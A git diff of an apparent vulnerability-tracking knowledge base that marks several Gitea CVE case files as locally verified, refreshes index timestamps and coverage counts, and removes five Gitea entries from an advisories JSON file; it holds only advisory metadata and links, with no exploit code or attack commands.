 | Gitea vulnerable to Cross-site Scripting in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:50.473303Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68946.md) |
 | Gitea vulnerable to Argument Injection in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:41.181693Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-42968.md) |
 | Improper Privilege Management in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:33.136607Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45330.md) |
-| Gitea Remote Code Execution (RCE) in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:20.787387Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md) |
-| Denial of Service in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:17.939867Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md) |
-| Cross-site Scripting in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:18.307544Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md) |
 | Gitea Missing Authorization vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:50:45.472605Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-0905.md) |
 | Stored Cross-site Scripting in gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:50:45.577318Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1928.md) |
 | Arbitrary file deletion in gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:50:19.647131Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-27313.md) |
@@ -63,8 +58,6 @@
 | Reuse of one time passwords allowed in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:07.604662Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45331.md) |
 | Capture-replay in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:07.840324Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45327.md) |
 | Gitea erroneous repo clones in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:54:07.076900Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38795.md) |
-| Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:54:04.686907Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md) |
-| Gitea XSS Vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:53:57.848904Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md) |
 | Gitea allowed assignment of private issues in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:55:04.505871Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38183.md) |
 | Buffer Overflow in gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:55:15.307648Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-3382.md) |
 | Gitea Open Redirect in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:51:49.844240Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1058.md) |
diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md
index 2afba50f..37c0c109 100644
--- a/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md
+++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md
@@ -8,10 +8,10 @@ updated_date: "2026-03-03T04:54:04.686907Z"
 severity: "unknown"
 exploit_status: "unknown"
 source_confidence: "official"
-verification_status: "triage-manual"
-verification_mode: "synthetic"
-artifact_mode: "synthetic"
-last_run_id: ""
+verification_status: "verified-real"
+verification_mode: "real"
+artifact_mode: "local-fixture"
+last_run_id: "gitea-gitea--CVE-2018-15192-20260318012749"
 target_types:
   - "lab-local"
   - "lab-public"
@@ -41,12 +41,12 @@ primary_source: "https://github.com/advisories/GHSA-fg3x-rwq9-74cw"
 
 ## 本地实证状态
 
-- 实证状态: `triage-manual`
-- 实证方式: `synthetic`
-- Artifact 模式: `synthetic`
-- 最近运行: `-`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 最近运行: `gitea-gitea--CVE-2018-15192-20260318012749`
 - 浏览器证据: `missing`
-- Run Bundle: `-`
+- Run Bundle: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749`
 
 ## 事件层
 
diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md
index 4c53c119..15192c4e 100644
--- a/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md
+++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md
@@ -8,10 +8,10 @@ updated_date: "2026-03-03T04:52:20.787387Z"
 severity: "unknown"
 exploit_status: "unknown"
 source_confidence: "official"
-verification_status: "triage-manual"
-verification_mode: "synthetic"
-artifact_mode: "synthetic"
-last_run_id: ""
+verification_status: "verified-real"
+verification_mode: "real"
+artifact_mode: "local-fixture"
+last_run_id: "gitea-gitea--CVE-2018-18926-20260318012526"
 target_types:
   - "lab-local"
   - "lab-public"
@@ -38,12 +38,12 @@ primary_source: "https://github.com/advisories/GHSA-hf6f-jq25-8gq9"
 
 ## 本地实证状态
 
-- 实证状态: `triage-manual`
-- 实证方式: `synthetic`
-- Artifact 模式: `synthetic`
-- 最近运行: `-`
-- 浏览器证据: `missing`
-- Run Bundle: `-`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 最近运行: `gitea-gitea--CVE-2018-18926-20260318012526`
+- 浏览器证据: `present`
+- Run Bundle: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526`
 
 ## 事件层
 
diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md
index 8ebddbdb..991b74a9 100644
--- a/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md
+++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md
@@ -8,10 +8,10 @@ updated_date: "2026-03-03T04:53:57.848904Z"
 severity: "unknown"
 exploit_status: "unknown"
 source_confidence: "official"
-verification_status: "triage-manual"
-verification_mode: "synthetic"
-artifact_mode: "synthetic"
-last_run_id: ""
+verification_status: "verified-real"
+verification_mode: "real"
+artifact_mode: "local-fixture"
+last_run_id: "gitea-gitea--CVE-2019-1010261-20260318012624"
 target_types:
   - "lab-local"
   - "lab-public"
@@ -39,12 +39,12 @@ primary_source: "https://github.com/advisories/GHSA-5rh7-6gfj-mc87"
 
 ## 本地实证状态
 
-- 实证状态: `triage-manual`
-- 实证方式: `synthetic`
-- Artifact 模式: `synthetic`
-- 最近运行: `-`
-- 浏览器证据: `missing`
-- Run Bundle: `-`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 最近运行: `gitea-gitea--CVE-2019-1010261-20260318012624`
+- 浏览器证据: `present`
+- Run Bundle: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624`
 
 ## 事件层
 
diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md
index 1a22bdfa..66533196 100644
--- a/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md
+++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md
@@ -8,10 +8,10 @@ updated_date: "2026-03-03T04:52:17.939867Z"
 severity: "unknown"
 exploit_status: "unknown"
 source_confidence: "official"
-verification_status: "triage-manual"
-verification_mode: "synthetic"
-artifact_mode: "synthetic"
-last_run_id: ""
+verification_status: "verified-real"
+verification_mode: "real"
+artifact_mode: "local-fixture"
+last_run_id: "gitea-gitea--CVE-2020-13246-20260318012806"
 target_types:
   - "lab-local"
   - "lab-public"
@@ -39,12 +39,12 @@ primary_source: "https://github.com/advisories/GHSA-g2qx-6ghw-67hm"
 
 ## 本地实证状态
 
-- 实证状态: `triage-manual`
-- 实证方式: `synthetic`
-- Artifact 模式: `synthetic`
-- 最近运行: `-`
-- 浏览器证据: `missing`
-- Run Bundle: `-`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 最近运行: `gitea-gitea--CVE-2020-13246-20260318012806`
+- 浏览器证据: `present`
+- Run Bundle: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806`
 
 ## 事件层
 
diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md
index e41687e2..c578f4fd 100644
--- a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md
+++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md
@@ -8,10 +8,10 @@ updated_date: "2026-03-03T04:52:18.307544Z"
 severity: "unknown"
 exploit_status: "unknown"
 source_confidence: "official"
-verification_status: "triage-manual"
-verification_mode: "synthetic"
-artifact_mode: "synthetic"
-last_run_id: ""
+verification_status: "verified-real"
+verification_mode: "real"
+artifact_mode: "local-fixture"
+last_run_id: "gitea-gitea--CVE-2021-28378-20260318012813"
 target_types:
   - "lab-local"
   - "lab-public"
@@ -40,12 +40,12 @@ primary_source: "https://github.com/advisories/GHSA-g95p-88p4-76cm"
 
 ## 本地实证状态
 
-- 实证状态: `triage-manual`
-- 实证方式: `synthetic`
-- Artifact 模式: `synthetic`
-- 最近运行: `-`
-- 浏览器证据: `missing`
-- Run Bundle: `-`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 最近运行: `gitea-gitea--CVE-2021-28378-20260318012813`
+- 浏览器证据: `present`
+- Run Bundle: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813`
 
 ## 事件层
 
diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md
index 7b773d3e..5f453628 100644
--- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md
+++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md
@@ -8,10 +8,10 @@ updated_date: "2026-03-03T04:57:50.087298Z"
 severity: "unknown"
 exploit_status: "unknown"
 source_confidence: "official"
-verification_status: "triage-manual"
-verification_mode: "synthetic"
-artifact_mode: "synthetic"
-last_run_id: ""
+verification_status: "verified-real"
+verification_mode: "real"
+artifact_mode: "local-fixture"
+last_run_id: "gitea-gitea--CVE-2025-68940-20260318012708"
 target_types:
   - "lab-local"
   - "lab-public"
@@ -39,12 +39,12 @@ primary_source: "https://github.com/advisories/GHSA-rrcw-5rjv-vj26"
 
 ## 本地实证状态
 
-- 实证状态: `triage-manual`
-- 实证方式: `synthetic`
-- Artifact 模式: `synthetic`
-- 最近运行: `-`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 最近运行: `gitea-gitea--CVE-2025-68940-20260318012708`
 - 浏览器证据: `missing`
-- Run Bundle: `-`
+- Run Bundle: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708`
 
 ## 事件层
 
diff --git a/07-framework-security/platforms/gitlab-ce/INDEX.md b/07-framework-security/platforms/gitlab-ce/INDEX.md
index d4103dd2..bad74c49 100644
--- a/07-framework-security/platforms/gitlab-ce/INDEX.md
+++ b/07-framework-security/platforms/gitlab-ce/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:16+00:00`
+- 最近渲染时间: `2026-03-18T01:29:38+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/platforms/grafana/INDEX.md b/07-framework-security/platforms/grafana/INDEX.md
index 8ff2ce66..a5cb3ddc 100644
--- a/07-framework-security/platforms/grafana/INDEX.md
+++ b/07-framework-security/platforms/grafana/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:16+00:00`
+- 最近渲染时间: `2026-03-18T01:29:38+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/platforms/jenkins/INDEX.md b/07-framework-security/platforms/jenkins/INDEX.md
index 69df0645..3f624547 100644
--- a/07-framework-security/platforms/jenkins/INDEX.md
+++ b/07-framework-security/platforms/jenkins/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:16+00:00`
+- 最近渲染时间: `2026-03-18T01:29:38+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/platforms/kibana/INDEX.md b/07-framework-security/platforms/kibana/INDEX.md
index f9bed3e5..e640e59d 100644
--- a/07-framework-security/platforms/kibana/INDEX.md
+++ b/07-framework-security/platforms/kibana/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:16+00:00`
+- 最近渲染时间: `2026-03-18T01:29:38+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/platforms/mattermost/INDEX.md b/07-framework-security/platforms/mattermost/INDEX.md
index b399b152..e3e36b80 100644
--- a/07-framework-security/platforms/mattermost/INDEX.md
+++ b/07-framework-security/platforms/mattermost/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:16+00:00`
+- 最近渲染时间: `2026-03-18T01:29:38+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/platforms/phpmyadmin/INDEX.md b/07-framework-security/platforms/phpmyadmin/INDEX.md
index c205a603..91497b95 100644
--- a/07-framework-security/platforms/phpmyadmin/INDEX.md
+++ b/07-framework-security/platforms/phpmyadmin/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/platforms/redmine/INDEX.md b/07-framework-security/platforms/redmine/INDEX.md
index 2c6244ff..4511b552 100644
--- a/07-framework-security/platforms/redmine/INDEX.md
+++ b/07-framework-security/platforms/redmine/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:16+00:00`
+- 最近渲染时间: `2026-03-18T01:29:38+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/servers/apache-httpd/INDEX.md b/07-framework-security/servers/apache-httpd/INDEX.md
index b79fe8ba..66262dec 100644
--- a/07-framework-security/servers/apache-httpd/INDEX.md
+++ b/07-framework-security/servers/apache-httpd/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/servers/apache-tomcat/INDEX.md b/07-framework-security/servers/apache-tomcat/INDEX.md
index 92833bba..4e64e0be 100644
--- a/07-framework-security/servers/apache-tomcat/INDEX.md
+++ b/07-framework-security/servers/apache-tomcat/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/servers/caddy/INDEX.md b/07-framework-security/servers/caddy/INDEX.md
index bf25e96a..56c8ece0 100644
--- a/07-framework-security/servers/caddy/INDEX.md
+++ b/07-framework-security/servers/caddy/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/servers/haproxy/INDEX.md b/07-framework-security/servers/haproxy/INDEX.md
index 4388ac83..b4985c4c 100644
--- a/07-framework-security/servers/haproxy/INDEX.md
+++ b/07-framework-security/servers/haproxy/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/servers/nginx/INDEX.md b/07-framework-security/servers/nginx/INDEX.md
index 4af4760d..b95b7c87 100644
--- a/07-framework-security/servers/nginx/INDEX.md
+++ b/07-framework-security/servers/nginx/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/servers/traefik/INDEX.md b/07-framework-security/servers/traefik/INDEX.md
index 3da77fca..c64c6f1f 100644
--- a/07-framework-security/servers/traefik/INDEX.md
+++ b/07-framework-security/servers/traefik/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/08-threat-intel/generated/coverage-matrix.md b/08-threat-intel/generated/coverage-matrix.md
index 3f495582..bdabd2bc 100644
--- a/08-threat-intel/generated/coverage-matrix.md
+++ b/08-threat-intel/generated/coverage-matrix.md
@@ -21,7 +21,7 @@
 | Flask | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Ghost | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Gin | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
-| Gitea | `platforms` | `rolling-24m` | `-` | `yes` | `37` | `37` | `3` | `seeded` | `real:0/synthetic:0/blocked:1` | `0` | `1` | `0` | `2026-03-03T04:57:57.697708Z` |
+| Gitea | `platforms` | `rolling-24m` | `-` | `yes` | `30` | `30` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-03T04:57:57.697708Z` |
 | GitLab CE | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Grafana | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Hapi | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
@@ -37,7 +37,7 @@
 | Medusa | `ecommerce` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Moodle | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | NestJS | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
-| Next.js | `frameworks` | `history-full` | `yes` | `yes` | `26` | `26` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `1` | `0` | `2026-03-13T22:14:13.665535Z` |
+| Next.js | `frameworks` | `history-full` | `yes` | `yes` | `24` | `24` | `3` | `seeded` | `real:1/synthetic:0/blocked:0` | `0` | `1` | `0` | `2026-03-13T22:00:36.554552Z` |
 | Nginx | `servers` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Node.js | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
 | Nuxt | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` |
diff --git a/08-threat-intel/generated/dashboard/advisories.json b/08-threat-intel/generated/dashboard/advisories.json
index e6c43459..368d49d4 100644
--- a/08-threat-intel/generated/dashboard/advisories.json
+++ b/08-threat-intel/generated/dashboard/advisories.json
@@ -1,206 +1,4 @@
 {
-  "gitea--CVE-2018-15192": {
-    "canonical_id": "gitea--CVE-2018-15192",
-    "title": "Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea",
-    "summary": "Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea",
-    "display_name": "Gitea",
-    "system_id": "gitea",
-    "category": "platforms",
-    "severity": "unknown",
-    "cvss_score": null,
-    "exploit_status": "unknown",
-    "published_at": "2024-08-20T20:32:20Z",
-    "updated_at": "2026-03-03T04:54:04.686907Z",
-    "official_source_url": "https://github.com/advisories/GHSA-fg3x-rwq9-74cw",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2018-15192",
-      "https://github.com/go-gitea/gitea/commit/599ff1c054e436daa4dc3f049aa8661d9c2395f9",
-      "https://github.com/go-gitea/gitea/issues/4624",
-      "https://github.com/go-gitea/gitea/pull/17482",
-      "https://github.com/gogs/gogs/commit/22717a1c064511cf37c46af5e650baf7184cf25b",
-      "https://github.com/gogs/gogs/issues/5366",
-      "https://github.com/gogs/gogs/pull/6002"
-    ],
-    "aliases": [
-      "CVE-2018-15192",
-      "GHSA-fg3x-rwq9-74cw",
-      "GO-2023-1971"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "token-cookie-storage",
-      "proxy-trust-boundary",
-      "ssrf-url-validation"
-    ],
-    "verification_status": "triage-manual",
-    "verification_mode": "synthetic",
-    "artifact_mode": "synthetic",
-    "blocked_reason": null,
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
-  "gitea--CVE-2018-18926": {
-    "canonical_id": "gitea--CVE-2018-18926",
-    "title": "Gitea Remote Code Execution (RCE) in code.gitea.io/gitea",
-    "summary": "Gitea Remote Code Execution (RCE) in code.gitea.io/gitea",
-    "display_name": "Gitea",
-    "system_id": "gitea",
-    "category": "platforms",
-    "severity": "unknown",
-    "cvss_score": null,
-    "exploit_status": "unknown",
-    "published_at": "2024-08-21T15:29:04Z",
-    "updated_at": "2026-03-03T04:52:20.787387Z",
-    "official_source_url": "https://github.com/advisories/GHSA-hf6f-jq25-8gq9",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2018-18926",
-      "https://github.com/go-gitea/gitea/commit/aeb5655c25053bdcd7eee94ea37df88468374162",
-      "https://github.com/go-gitea/gitea/issues/5140",
-      "https://github.com/go-gitea/gitea/pull/5177"
-    ],
-    "aliases": [
-      "CVE-2018-18926",
-      "GHSA-hf6f-jq25-8gq9",
-      "GO-2022-0844"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "token-cookie-storage",
-      "proxy-trust-boundary"
-    ],
-    "verification_status": "triage-manual",
-    "verification_mode": "synthetic",
-    "artifact_mode": "synthetic",
-    "blocked_reason": null,
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
-  "gitea--CVE-2019-1010261": {
-    "canonical_id": "gitea--CVE-2019-1010261",
-    "title": "Gitea XSS Vulnerability in code.gitea.io/gitea",
-    "summary": "Gitea XSS Vulnerability in code.gitea.io/gitea",
-    "display_name": "Gitea",
-    "system_id": "gitea",
-    "category": "platforms",
-    "severity": "unknown",
-    "cvss_score": null,
-    "exploit_status": "unknown",
-    "published_at": "2024-08-20T20:31:38Z",
-    "updated_at": "2026-03-03T04:53:57.848904Z",
-    "official_source_url": "https://github.com/advisories/GHSA-5rh7-6gfj-mc87",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2019-1010261",
-      "https://github.com/go-gitea/gitea/pull/5905"
-    ],
-    "aliases": [
-      "CVE-2019-1010261",
-      "GHSA-5rh7-6gfj-mc87",
-      "GO-2023-1922"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "token-cookie-storage",
-      "proxy-trust-boundary",
-      "xss-output-encoding"
-    ],
-    "verification_status": "triage-manual",
-    "verification_mode": "synthetic",
-    "artifact_mode": "synthetic",
-    "blocked_reason": null,
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
-  "gitea--CVE-2020-13246": {
-    "canonical_id": "gitea--CVE-2020-13246",
-    "title": "Denial of Service in Gitea in code.gitea.io/gitea",
-    "summary": "Denial of Service in Gitea in code.gitea.io/gitea",
-    "display_name": "Gitea",
-    "system_id": "gitea",
-    "category": "platforms",
-    "severity": "unknown",
-    "cvss_score": null,
-    "exploit_status": "unknown",
-    "published_at": "2024-08-21T15:29:04Z",
-    "updated_at": "2026-03-03T04:52:17.939867Z",
-    "official_source_url": "https://github.com/advisories/GHSA-g2qx-6ghw-67hm",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2020-13246",
-      "https://github.com/go-gitea/gitea/issues/10549",
-      "https://github.com/go-gitea/gitea/pull/11438",
-      "https://www.youtube.com/watch?v=DmVgADSVS88"
-    ],
-    "aliases": [
-      "BIT-gitea-2020-13246",
-      "CVE-2020-13246",
-      "GHSA-g2qx-6ghw-67hm",
-      "GO-2022-0830"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "token-cookie-storage",
-      "proxy-trust-boundary"
-    ],
-    "verification_status": "triage-manual",
-    "verification_mode": "synthetic",
-    "artifact_mode": "synthetic",
-    "blocked_reason": null,
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
-  "gitea--CVE-2021-28378": {
-    "canonical_id": "gitea--CVE-2021-28378",
-    "title": "Cross-site Scripting in Gitea in code.gitea.io/gitea",
-    "summary": "Cross-site Scripting in Gitea in code.gitea.io/gitea",
-    "display_name": "Gitea",
-    "system_id": "gitea",
-    "category": "platforms",
-    "severity": "unknown",
-    "cvss_score": null,
-    "exploit_status": "unknown",
-    "published_at": "2024-08-21T15:29:04Z",
-    "updated_at": "2026-03-03T04:52:18.307544Z",
-    "official_source_url": "https://github.com/advisories/GHSA-g95p-88p4-76cm",
-    "secondary_source_urls": [
-      "https://nvd.nist.gov/vuln/detail/CVE-2021-28378",
-      "https://blog.gitea.io/2021/03/gitea-1.13.4-is-released",
-      "https://github.com/PandatiX/CVE-2021-28378",
-      "https://github.com/go-gitea/gitea/pull/14898",
-      "https://github.com/go-gitea/gitea/pull/14899"
-    ],
-    "aliases": [
-      "BIT-gitea-2021-28378",
-      "CVE-2021-28378",
-      "GHSA-g95p-88p4-76cm",
-      "GO-2022-0832"
-    ],
-    "secure_code_topics": [
-      "authz-server-side-recheck",
-      "token-cookie-storage",
-      "proxy-trust-boundary",
-      "xss-output-encoding"
-    ],
-    "verification_status": "triage-manual",
-    "verification_mode": "synthetic",
-    "artifact_mode": "synthetic",
-    "blocked_reason": null,
-    "browser_evidence": {
-      "required": false,
-      "present": false,
-      "refs": []
-    }
-  },
   "gitea--CVE-2021-29134": {
